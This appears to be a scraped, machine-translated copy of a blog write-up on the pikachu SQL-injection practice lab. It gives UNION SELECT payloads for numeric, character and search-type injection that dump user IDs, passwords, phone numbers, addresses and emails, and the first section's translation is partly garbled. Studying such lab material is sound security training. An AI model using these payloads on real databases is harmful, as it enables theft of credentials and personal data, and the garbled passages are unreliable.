第三の実験--pikachuウェブSQLインジェクション

その他 2019-12-13 19:05:29 訪問数: null

(A)数値注射

 

ペイロードの構造は追加の情報をメモした後、最初に、注入点を見つけるために、ペイロード構造体の値を変更

 

 名前ルックアップテーブル

 

 チェックフィールド名

最終的な入力ペイロード:

= " 1つの 組合 選択 CONCAT(ID、' | '、ユーザ名、' | '、パスワード、' | 'レベル)、2  からユーザー"

結果

 

(B)の文字を注入

単一引用符の文字列のうち、最後に#Zhushidiao過剰SQLステートメントを使用して、直接、最終的なペイロードを与え、前のステップ名フィールド名のルックアップテーブルをスキップ:

' union select id,concat(username,'|',pw,'|',sex,'|',phonenum,'|',address,'|',email) from member#

(三)搜索型注入

搜索型查询使用的是如下格式sql语句:

select username from user where username like '%{$username}%';

此时可将{$username}部分构造成payload:

 

a%' union select 1 from member#

 

此时执行的sql语句为:

select username from user where username like '%a%' union select 1 from member#%';

 

因此构造最后的payload:

a%' union select 1,id,concat(username,'|',pw,'|',sex,'|',phonenum,'|',address,'|',email) from member#

おすすめ

転載: www.cnblogs.com/p201721430024/p/12036732.html
おすすめ
NetBSD は AI によって生成されたコードの提出を禁止します
ランキング
C#の変数インスタンス、クレジット・カードケース
通过uniCloud白捡一个在线图库管理工具
Linuxのいくつかの基本的なコマンドに関する洞察(20ベース)
vueエントリーの基礎知識、コア知識をマスターするならこの記事で十分
食品化学クエスチョンバンク
CentOSの7制御システムは、ファイルを占めます
単一の el-form 内の el-form-item テキストの左揃えを解決する方法
ノードJSベースノート
関数にSQL Serverの文字列:
sparksql_相関分析
アーカイブ
もっと
2024-05-18(30)
2024-05-17(6)
2024-05-16(24)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(27)
2024-05-11(31)
2024-05-10(33)
2024-05-09(30)

コードワールド

© 2018 codetd.com